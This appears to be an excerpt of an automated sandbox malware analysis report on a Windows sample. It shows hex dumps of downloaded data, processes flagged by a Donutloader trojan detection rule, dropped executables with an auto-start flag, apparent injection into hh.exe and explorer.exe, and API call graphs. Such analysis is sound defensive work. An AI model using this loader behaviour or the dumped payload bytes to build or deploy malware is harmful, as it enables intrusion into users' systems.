                                                                                                                                                                          2024-12-18 12:06:41 UTC1024INData Raw: ae 83 94 ef a0 a2 e4 ef 70 51 87 df 0f c5 d6 60 dc 3c ab 53 fb c4 79 b6 28 d4 37 26 a4 2a 81 d7 09 89 d1 0e c8 da ca 02 5d 66 7b ed b5 f7 e6 16 72 71 db fe 7e d0 12 68 e4 9e 15 9d 2a ff 9a 63 b8 b3 44 15 ad 92 99 04 0e 45 17 bc ec e4 a1 d7 64 5b ef 28 50 2e b9 ec 0e e5 b4 7d b2 bd 24 bd ef 90 73 ae b5 b7 31 54 3c 5e 5c 5a dd 57 00 aa 32 74 a8 ea f6 a8 ff ea 7c 6e d5 b8 20 7f fc 44 a1 dc 19 9d 0f 30 b4 88 28 a2 22 37 36 fb 5e 1e 5b 94 18 35 5c 91 64 cd 91 3a 54 d5 10 ba 9b cb 5f 11 95 55 25 48 c2 db 1c f0 e9 d4 8a 38 23 d9 43 21 8b fe 0d 50 e3 24 45 19 95 de ab 6e 9f 3b 41 54 85 14 af f4 67 09 1b 67 90 82 a2 43 b2 d3 5f 5f 71 df bf 0f 66 72 f1 cf ef e8 e4 fc b5 6d 6a 6f 79 ca 77 a4 f5 b8 19 63 0d 52 65 db ae 91 97 16 73 2c f7 f3 49 57 14 b1 9d c7 41 94 1c
                                                                                                                                                                          Data Ascii: pQ`<Sy(7&*]f{rq~h*cDEd[(P.}$s1T<^\ZW2t|n D0("76^[5\d:T_U%H8#C!P$En;ATggC__qfrmjoywcRes,IWA
                                                                                                                                                                          2024-12-18 12:06:42 UTC16384INData Raw: 90 14 c8 1c fa 67 0e 97 32 ca 48 8e 80 4f a8 50 a7 3e 02 12 5d 15 73 e8 19 a2 13 07 17 f1 b1 01 1f 7c a3 64 53 49 fb f6 a4 28 b4 e7 68 c5 6c 67 29 87 c3 be 72 dd 8b 3c 4d 40 55 9d b2 11 62 4e b2 1e 10 d8 24 68 1e b4 18 12 7a 96 4d 2b 78 db c6 6d 7b c3 0d 7e b6 f3 98 a6 65 db 09 64 db 7e af 37 33 51 b8 e1 62 bc f1 0e 32 7b aa 52 7d 33 fe 47 5c a5 a6 f1 b1 97 2f 5c fc fc 0e cb 40 00 a4 b2 25 02 3d d6 f9 10 26 e1 92 d9 11 34 d0 c0 13 80 60 be dc 21 77 d6 b5 09 19 df 8f 44 7a 2c 86 7a 56 b9 84 4e e8 f4 3a 74 88 aa 0a 44 d4 74 f3 80 76 fa bd e3 78 01 42 f4 61 a7 ba 71 11 9d 0f 7c 87 8b a7 c4 4f c3 92 f6 dd bf b3 c8 3e c3 9f 9f ff f9 72 92 2c 3a 3e 9d 39 63 7b f6 30 d9 d9 5f ae 58 17 9e cf f8 d8 7e bf 7f fd a7 87 7d 25 fe fa f5 ff 06 26 ff fb eb a7 ce bb a9 08
                                                                                                                                                                          Data Ascii: g2HOP>]s|dSI(hlg)r<M@UbN$hzM+xm{~ed~73Qb2{R}3G\/\@%=&4`!wDz,zVN:tDtvxBaq|O>r,:>9c{0_X~}%&
                                                                                                                                                                          2024-12-18 12:06:42 UTC1024INData Raw: 55 7d 7a d5 4d 4b 2f 7e 29 b9 a4 7c 7c 59 bb a3 f0 ec 93 10 d9 09 d4 ac e6 2b 44 05 ff 17 9e 18 01 70 4c 66 cb 6a 9c 84 fd 5c e2 48 48 e2 61 3a 5f 85 d5 14 13 61 ff d4 e1 88 43 3b 06 1e 03 3a 28 22 bf 44 dc 4c 1c e3 1f 5d 89 a1 1a cc 78 d9 e1 07 27 92 4e ff 24 87 e0 eb 4b 3c 97 43 88 5f 2e 28 e8 42 ed af c7 20 31 58 a6 d6 cc 7f 99 b3 e7 b3 7f 9e e7 49 9b 53 33 40 09 01 28 91 81 da db cc af 85 ce a9 fa 0d 1e 40 da 77 11 aa c4 90 8a 10 96 95 d1 fd 7e 17 0a 19 dc 1c 16 6c dc f9 72 66 fa a8 fa 86 d1 46 9c c0 77 6f 55 00 0a 88 9a 19 28 46 e1 21 f8 12 1e 03 c7 80 87 75 63 b6 3c 06 2f f6 99 4d 4d 14 54 a5 e7 85 7e 0a 0f ab 69 5f c0 53 b8 88 48 d5 ce 26 0b 15 95 93 b4 5f bf 1e 32 78 64 38 9b 63 f8 61 cb c2 c5 79 3e 4f 00 19 d1 c8 af a1 1e 6f 2f a3 27 21 e4 21 ca
                                                                                                                                                                          Data Ascii: U}zMK/~)||Y+DpLfj\HHa:_aC;:("DL]x'N$K<C_.(B 1XIS3@(@w~lrfFwoU(F!uc</MMT~i_SH&_2xd8cay>Oo/'!!
                                                                                                                                                                          2024-12-18 12:06:42 UTC1749INData Raw: 3c 4f d8 8e 8b 1b 34 5d d1 87 d9 68 b3 1c b7 fb d0 87 54 6c 97 6f ff e9 65 bf 5d 62 21 62 e0 e2 79 9e 73 9e e7 b9 70 51 95 53 dc 85 d6 a3 d4 8b 8d 6c 3b 1e 82 48 e8 93 c4 50 f3 cb 24 fb 5a 50 35 e8 92 4f 80 5c 65 fe 49 66 5c 02 d2 fb 23 7c 11 d7 9b c8 ba 8d 62 b0 63 3c 52 d9 75 6b 3c f4 a1 e7 3c ce af 63 9e 53 64 1c bf 7e f9 27 ae 66 3d 46 ec 52 85 5c 62 db 4a 4c a9 6d fd 7f e1 62 fa 4a 34 59 d3 84 f4 0c 85 0d 11 d1 b4 45 70 38 f7 a7 40 06 e5 90 91 ba 66 08 71 c2 cd dc d2 27 ce ad 64 67 fa a9 7a e9 8e 8b 79 4e 66 f1 6a f7 57 08 55 5c 4f b7 29 16 cf 5e 36 12 4b 0c 6a 95 0e b3 b3 76 d4 02 17 d5 74 00 f6 78 c8 63 8c 41 19 f0 64 54 a3 70 d1 87 6a 64 38 82 38 bd 1d 5e 2f 91 e9 e5 f9 1c ff fe 1e ab de 1b 2e 9e 73 45 d0 be e2 22 29 82 5f 7f 3c 5c 39 5e a8 58 46
                                                                                                                                                                          Data Ascii: <O4]hTloe]b!byspQSl;HP$ZP5O\eIf\#|bc<Ruk<<cSd~'f=FR\bJLmbJ4YEp8@fq'dgzyNfjWU\O)^6KjvtxcAdTpjd88^/.sE")_<\9^XF
                                                                                                                                                                          2024-12-18 12:06:42 UTC16384INData Raw: 6b 85 25 f0 79 b6 23 77 63 83 32 9a 50 58 12 8a a8 0c 85 12 b3 a0 c5 cc 8c a6 ac 05 e0 d0 3f 68 c2 49 78 c0 2c 0b f4 2f d9 96 5b b1 79 9d 65 f9 b0 6c 02 63 d7 63 7b 97 c9 64 ad b4 b3 a2 0d a6 fd a5 be 21 0a e3 b3 cd c0 8a f8 93 a4 65 30 62 4e 25 74 62 46 d2 2e 13 01 8e 88 7b 1f fe 5c 19 68 37 1c 58 34 73 81 d1 7a 30 7c a4 90 66 bd 71 2a 01 d8 a1 7f cf d8 3c 1e e3 f8 f5 35 8e 21 6a 60 1a 66 9d 9f 34 d7 25 0f 6b 60 ee c9 4f 51 3f 7b b1 d0 3d e3 aa ef 52 6b d2 ab 71 50 4a 5f 4c 7d 32 e3 6f a4 81 76 08 06 cd cf 5c 59 4c 9c ba 4b 93 e9 8c e1 cb 51 4f 99 c5 00 0c 91 14 67 98 51 d2 82 79 38 aa 9c 16 a1 0a 35 87 a7 96 a3 e6 6e ad 33 12 cb bf 9e 11 ce 2a e4 56 90 aa 34 d3 e9 87 25 c2 ff d6 73 71 d8 f7 19 c3 ef 15 b8 3f ea 54 35 85 c2 be cf f3 cf e7 39 0d a7 9e cf
                                                                                                                                                                          Data Ascii: k%y#wc2PX?hIx,/[yelcc{d!e0bN%tbF.{\h7X4sz0|fq*<5!j`f4%k`OQ?{=RkqPJ_L}2ov\YLKQOgQy85n3*V4%sq?T59
                                                                                                                                                                          2024-12-18 12:06:42 UTC1024INData Raw: 36 40 ba 70 57 f2 be b5 a8 74 7f a1 c4 e2 99 6f 2e 69 03 74 a7 1b d5 c5 21 3a 08 f5 d7 f8 5e 5f dc d4 d6 2b 6f 05 10 59 cc 5f d1 6b 7c 7a 29 ff 32 9d cc dd b2 4b c3 3a 2e 72 f9 1d 74 6e 9e f3 0b 5f ba 41 75 32 58 a6 57 5a 45 62 7c cf f4 b3 91 97 be 67 a7 e9 4c ac 8c b1 c4 6b 05 ee 23 99 76 f0 ab 27 5d f6 b2 fd cd 4f 0d fe 7c dd f9 c0 6f ad 9f 57 9f d7 a3 4f 6d 59 cb 7f b3 9e fb 7d 9c 82 b2 b5 29 97 1c dc 56 df 3d 9a ce e0 97 08 f9 18 22 c7 43 1e 5f 8f 7f fd eb 3c cf a9 aa 5f 8f c3 43 c3 1c c7 f8 fa 7a 7c 1d 8f 63 1c e3 18 87 27 1e 87 a9 06 c1 b0 52 b1 b2 d9 b7 dc da f5 bf d9 7b b3 2d 49 72 1c 4b f0 02 a4 a8 99 7b 44 4d ff ff 07 f6 39 f5 34 35 3d a7 32 dd 4d 55 08 f4 03 b8 80 14 ca a2 a6 6e 91 11 59 c1 8c 34 17 15 e1 02 6e b8 00 48 82 d4 58 b6 8d 25 23 c1
                                                                                                                                                                          Data Ascii: 6@pWto.it!:^_+oY_k|z)2K:.rtn_Au2XWZEb|gLk#v']O|oWOmY})V="C_<_Cz|c'R{-IrK{DM945=2MUnY4nHX%#
                                                                                                                                                                          2024-12-18 12:06:42 UTC16384INData Raw: 37 d0 32 b7 5a ab 25 33 26 9a 4a e4 54 d6 7a 10 94 32 b3 f2 ec 29 5b 29 45 b4 1c bf 73 2d 02 90 a8 32 04 05 e7 3a 06 8c 2e 6e be cb d8 7b f7 2f 2d 46 94 cf 62 6e 9a 0d f5 88 e0 3e 90 d0 f0 6c 42 bb 9a e6 87 56 95 e2 eb 6a 68 72 14 0b 50 3e 7e 5f 93 78 36 5e d9 7f a7 bb e6 46 34 61 82 08 10 68 f1 72 a0 bd 23 13 05 40 0c 96 ee 3c 9a 9f b6 85 9a 21 d4 2c aa 14 5a ef 74 02 99 53 b2 ec e6 74 a8 1a e2 72 8b 00 d6 75 d5 a1 d7 7c 93 a8 a6 ec 37 f9 dc d7 f3 54 5e 76 95 f1 0f 35 ff d6 0a fe c8 4d 7d e6 40 03 cf 6d 96 39 f2 92 f7 5c d3 75 fd 34 0f 43 7f 17 f3 9a d1 4e aa b0 73 fd c6 28 99 11 4a a0 32 e6 ea 39 16 23 8e 0c bb 5a fe ac 68 6e 87 b4 59 43 33 6b 4e 29 65 56 1e 42 b9 9c a4 ee af 11 64 10 54 29 13 86 f2 ae 90 1c 87 dd 73 51 80 90 ff 9a 4b 1e 49 14 98 43 8c
                                                                                                                                                                          Data Ascii: 72Z%3&JTz2)[)Es-2:.n{/-Fbn>lBVjhrP>~_x6^F4ahr#@<!,ZtStru|7T^v5M}@m9\u4CNs(J29#ZhnYC3kN)eVBdT)sQKIC


                                                                                                                                                                          Click to jump to process

                                                                                                                                                                          Click to jump to process

                                                                                                                                                                          Click to dive into process behavior distribution

                                                                                                                                                                          Click to jump to process

                                                                                                                                                                          Target ID:0
                                                                                                                                                                          Start time:07:05:52
                                                                                                                                                                          Start date:18/12/2024
                                                                                                                                                                          Path:C:\Users\user\Desktop\nrGkqbCyKP.exe
                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                          Commandline:"C:\Users\user\Desktop\nrGkqbCyKP.exe"
                                                                                                                                                                          Imagebase:0x6e0000
                                                                                                                                                                          File size:43'976 bytes
                                                                                                                                                                          MD5 hash:84101C768BFD9493C2926066E7AAA6F2
                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Yara matches:
                                                                                                                                                                          • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000000.00000002.1995710016.0000000003CA3000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                          Reputation:low
                                                                                                                                                                          Has exited:true

                                                                                                                                                                          Target ID:6
                                                                                                                                                                          Start time:07:06:44
                                                                                                                                                                          Start date:18/12/2024
                                                                                                                                                                          Path:C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exe
                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                          Commandline:"C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exe"
                                                                                                                                                                          Imagebase:0x7ff79cfb0000
                                                                                                                                                                          File size:2'659'840 bytes
                                                                                                                                                                          MD5 hash:44AD77338A945FE1451861B59267A68D
                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Yara matches:
                                                                                                                                                                          • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000006.00000002.1995777585.0000029D64782000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                          Antivirus matches:
                                                                                                                                                                          • Detection: 0%, ReversingLabs
                                                                                                                                                                          Reputation:low
                                                                                                                                                                          Has exited:true

                                                                                                                                                                          Target ID:7
                                                                                                                                                                          Start time:07:06:44
                                                                                                                                                                          Start date:18/12/2024
                                                                                                                                                                          Path:C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exe
                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                          Commandline:C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exe /aut
                                                                                                                                                                          Imagebase:0x7ff79cfb0000
                                                                                                                                                                          File size:2'659'840 bytes
                                                                                                                                                                          MD5 hash:44AD77338A945FE1451861B59267A68D
                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Yara matches:
                                                                                                                                                                          • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000007.00000002.2059630246.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Author: unknown
                                                                                                                                                                          • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000007.00000002.2059338632.0000026ADFDF7000.00000008.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                          • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000007.00000002.2058693773.0000026ADFC50000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                          • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000007.00000003.2010588639.0000026ADE1D5000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                          Reputation:low
                                                                                                                                                                          Has exited:true

                                                                                                                                                                          Target ID:8
                                                                                                                                                                          Start time:07:06:45
                                                                                                                                                                          Start date:18/12/2024
                                                                                                                                                                          Path:C:\Windows\hh.exe
                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                          Commandline:C:\windows\hh.exe
                                                                                                                                                                          Imagebase:0x7ff6cdce0000
                                                                                                                                                                          File size:18'432 bytes
                                                                                                                                                                          MD5 hash:2C8FE78D53C8CA27523A71DFD2938241
                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Yara matches:
                                                                                                                                                                          • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000008.00000002.2733221999.000001E47A9F0000.00000020.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                          Reputation:moderate
                                                                                                                                                                          Has exited:false

                                                                                                                                                                          Target ID:11
                                                                                                                                                                          Start time:07:06:45
                                                                                                                                                                          Start date:18/12/2024
                                                                                                                                                                          Path:C:\Windows\System32\WerFault.exe
                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                          Commandline:C:\Windows\system32\WerFault.exe -u -p 7064 -s 396
                                                                                                                                                                          Imagebase:0x7ff62e100000
                                                                                                                                                                          File size:570'736 bytes
                                                                                                                                                                          MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Reputation:high
                                                                                                                                                                          Has exited:true

                                                                                                                                                                          Target ID:12
                                                                                                                                                                          Start time:07:06:47
                                                                                                                                                                          Start date:18/12/2024
                                                                                                                                                                          Path:C:\Windows\explorer.exe
                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                          Commandline:C:\Windows\Explorer.EXE
                                                                                                                                                                          Imagebase:0x7ff62d7d0000
                                                                                                                                                                          File size:5'141'208 bytes
                                                                                                                                                                          MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Yara matches:
                                                                                                                                                                          • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 0000000C.00000002.2045463001.0000000000B70000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                          • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 0000000C.00000000.2018147867.0000000000B70000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                          Reputation:high
                                                                                                                                                                          Has exited:true

                                                                                                                                                                          Target ID:14
                                                                                                                                                                          Start time:07:06:50
                                                                                                                                                                          Start date:18/12/2024
                                                                                                                                                                          Path:C:\Windows\System32\WerFault.exe
                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                          Commandline:C:\Windows\system32\WerFault.exe -u -p 7064 -s 92
                                                                                                                                                                          Imagebase:0x7ff62e100000
                                                                                                                                                                          File size:570'736 bytes
                                                                                                                                                                          MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Reputation:high
                                                                                                                                                                          Has exited:true

                                                                                                                                                                          Target ID:15
                                                                                                                                                                          Start time:07:06:50
                                                                                                                                                                          Start date:18/12/2024
                                                                                                                                                                          Path:C:\Windows\explorer.exe
                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                          Commandline:explorer.exe
                                                                                                                                                                          Imagebase:0x7ff62d7d0000
                                                                                                                                                                          File size:5'141'208 bytes
                                                                                                                                                                          MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Reputation:high
                                                                                                                                                                          Has exited:false

                                                                                                                                                                          Target ID:22
                                                                                                                                                                          Start time:07:07:01
                                                                                                                                                                          Start date:18/12/2024
                                                                                                                                                                          Path:C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exe
                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                          Commandline:C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exe
                                                                                                                                                                          Imagebase:0x7ff79cfb0000
                                                                                                                                                                          File size:2'659'840 bytes
                                                                                                                                                                          MD5 hash:44AD77338A945FE1451861B59267A68D
                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Reputation:low
                                                                                                                                                                          Has exited:true

                                                                                                                                                                          Target ID:25
                                                                                                                                                                          Start time:07:07:02
                                                                                                                                                                          Start date:18/12/2024
                                                                                                                                                                          Path:C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exe
                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                          Commandline:C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exe /aut
                                                                                                                                                                          Imagebase:0x7ff79cfb0000
                                                                                                                                                                          File size:2'659'840 bytes
                                                                                                                                                                          MD5 hash:44AD77338A945FE1451861B59267A68D
                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Reputation:low
                                                                                                                                                                          Has exited:true

                                                                                                                                                                          Reset < >

                                                                                                                                                                            Execution Graph

                                                                                                                                                                            Execution Coverage:9.1%
                                                                                                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                            Signature Coverage:0%
                                                                                                                                                                            Total number of Nodes:78
                                                                                                                                                                            Total number of Limit Nodes:4
                                                                                                                                                                            execution_graph 15760 103ac30 15761 103ac3f 15760->15761 15764 103ad19 15760->15764 15769 103ad28 15760->15769 15765 103ad5c 15764->15765 15766 103ad39 15764->15766 15765->15761 15766->15765 15767 103af60 GetModuleHandleW 15766->15767 15768 103af8d 15767->15768 15768->15761 15770 103ad5c 15769->15770 15771 103ad39 15769->15771 15770->15761 15771->15770 15772 103af60 GetModuleHandleW 15771->15772 15773 103af8d 15772->15773 15773->15761 15686 1034668 15687 1034672 15686->15687 15691 1034758 15686->15691 15696 1033e28 15687->15696 15689 103468d 15692 103477d 15691->15692 15700 1034858 15692->15700 15704 1034868 15692->15704 15697 1033e33 15696->15697 15699 1036f8e 15697->15699 15712 1035c34 15697->15712 15699->15689 15702 103488f 15700->15702 15701 103496c 15701->15701 15702->15701 15708 10344b0 15702->15708 15705 103488f 15704->15705 15706 103496c 15705->15706 15707 10344b0 CreateActCtxA 15705->15707 15707->15706 15709 10358f8 CreateActCtxA 15708->15709 15711 10359bb 15709->15711 15713 1035c3f 15712->15713 15716 1035c64 15713->15716 15715 1037065 15715->15699 15717 1035c6f 15716->15717 15720 1035c94 15717->15720 15719 1037142 15719->15715 15721 1035c9f 15720->15721 15724 1035cc4 15721->15724 15723 1037245 15723->15719 15726 1035ccf 15724->15726 15725 1038589 15725->15723 15726->15725 15729 103ccf0 15726->15729 15733 103cce1 15726->15733 15730 103cd11 15729->15730 15731 103cd35 15730->15731 15737 103cea0 15730->15737 15731->15725 15734 103cd11 15733->15734 15735 103cd35 15734->15735 15736 103cea0 2 API calls 15734->15736 15735->15725 15736->15735 15739 103cead 15737->15739 15738 103cee7 15738->15731 15739->15738 15741 103b700 15739->15741 15742 103b70b 15741->15742 15744 103dbf8 15742->15744 15745 103d004 15742->15745 15744->15744 15746 103d00f 15745->15746 15747 1035cc4 2 API calls 15746->15747 15748 103dc67 15747->15748 15749 103dc76 15748->15749 15752 103dce0 15748->15752 15756 103dcd0 15748->15756 15749->15744 15753 103dd0e 15752->15753 15754 103ddda KiUserCallbackDispatcher 15753->15754 15755 103dddf 15753->15755 15754->15755 15757 103dd0e 15756->15757 15758 103ddda KiUserCallbackDispatcher 15757->15758 15759 103dddf 15757->15759 15758->15759 15774 103d3b8 15775 103d3fe 15774->15775 15779 103d587 15775->15779 15782 103d598 15775->15782 15776 103d4eb 15785 103b710 15779->15785 15783 103b710 DuplicateHandle 15782->15783 15784 103d5c6 15782->15784 15783->15784 15784->15776 15786 103d600 DuplicateHandle 15785->15786 15787 103d5c6 15786->15787 15787->15776

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            APIs
                                                                                                                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 0103AF7E
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1994320772.0000000001030000.00000040.00000800.00020000.00000000.sdmp, Offset: 01030000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_1030000_nrGkqbCyKP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: HandleModule
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 4139908857-0
                                                                                                                                                                            • Opcode ID: 53623b27cca8884e89c49c5fe85511126de7d4b27d5db739ff45c2ef6b3b4317
                                                                                                                                                                            • Instruction ID: b67c2006619b7fa53e7a0f390783c27c5d402bec4506508a92a6722ae1222269
                                                                                                                                                                            • Opcode Fuzzy Hash: 53623b27cca8884e89c49c5fe85511126de7d4b27d5db739ff45c2ef6b3b4317
                                                                                                                                                                            • Instruction Fuzzy Hash: EB714370A00B05CFE765DF2AD44579ABBF5BF88304F00892ED48ACBA50DB35E8058B91

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 57 10358ec-103596c 58 103596f-10359b9 CreateActCtxA 57->58 60 10359c2-1035a1c 58->60 61 10359bb-10359c1 58->61 68 1035a2b-1035a2f 60->68 69 1035a1e-1035a21 60->69 61->60 70 1035a31-1035a3d 68->70 71 1035a40 68->71 69->68 70->71 72 1035a41 71->72 72->72
                                                                                                                                                                            APIs
                                                                                                                                                                            • CreateActCtxA.KERNEL32(?), ref: 010359A9
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1994320772.0000000001030000.00000040.00000800.00020000.00000000.sdmp, Offset: 01030000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_1030000_nrGkqbCyKP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Create
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2289755597-0
                                                                                                                                                                            • Opcode ID: 319f20ae35c4215cf4876eebce5445d6854cc842369dc5037de2c8f645945139
                                                                                                                                                                            • Instruction ID: 6a75211cb46fa2fc7694ceaaf35cc1e0cc01e53980f4ce86839064f034078268
                                                                                                                                                                            • Opcode Fuzzy Hash: 319f20ae35c4215cf4876eebce5445d6854cc842369dc5037de2c8f645945139
                                                                                                                                                                            • Instruction Fuzzy Hash: E04101B0D00719CFDB24DFA9C884BCDBBB5BF85714F20806AC408AB255DB756946CF90

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 74 10344b0-10359b9 CreateActCtxA 78 10359c2-1035a1c 74->78 79 10359bb-10359c1 74->79 86 1035a2b-1035a2f 78->86 87 1035a1e-1035a21 78->87 79->78 88 1035a31-1035a3d 86->88 89 1035a40 86->89 87->86 88->89 90 1035a41 89->90 90->90
                                                                                                                                                                            APIs
                                                                                                                                                                            • CreateActCtxA.KERNEL32(?), ref: 010359A9
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1994320772.0000000001030000.00000040.00000800.00020000.00000000.sdmp, Offset: 01030000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_1030000_nrGkqbCyKP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Create
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2289755597-0
                                                                                                                                                                            • Opcode ID: b7f528a29d2a5a4b6606026d77995ef7f41a94ba3500df5604bf7b7e797bf639
                                                                                                                                                                            • Instruction ID: 2edd9feb7a9b0c2a99d12973681fedabf0f87632f6b1441bf1562e8a5a7b8465
                                                                                                                                                                            • Opcode Fuzzy Hash: b7f528a29d2a5a4b6606026d77995ef7f41a94ba3500df5604bf7b7e797bf639
                                                                                                                                                                            • Instruction Fuzzy Hash: 5A41E2B0C00719CFEB24DFA9C88478EBBF5BF89704F20816AD508AB255DB756946CF90

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 92 1035a64-1035a6f 94 1035ae9-1035b03 92->94
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1994320772.0000000001030000.00000040.00000800.00020000.00000000.sdmp, Offset: 01030000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_1030000_nrGkqbCyKP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 37512ff0ccf369ee3c8a15a500dcd6370233b86bdb4be112aa7e346dd5a63636
                                                                                                                                                                            • Instruction ID: c495233cada44b884c54940a132bb060f9f18508fd2a1c41323d087bd68cf82e
                                                                                                                                                                            • Opcode Fuzzy Hash: 37512ff0ccf369ee3c8a15a500dcd6370233b86bdb4be112aa7e346dd5a63636
                                                                                                                                                                            • Instruction Fuzzy Hash: E431FC71C04749CFEB21DFA8C8457DEBBF5AF86724F14818AC085AB266C776A906CB41

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 96 103b710-103d694 DuplicateHandle 98 103d696-103d69c 96->98 99 103d69d-103d6ba 96->99 98->99
                                                                                                                                                                            APIs
                                                                                                                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0103D5C6,?,?,?,?,?), ref: 0103D687
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1994320772.0000000001030000.00000040.00000800.00020000.00000000.sdmp, Offset: 01030000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_1030000_nrGkqbCyKP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: DuplicateHandle
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3793708945-0
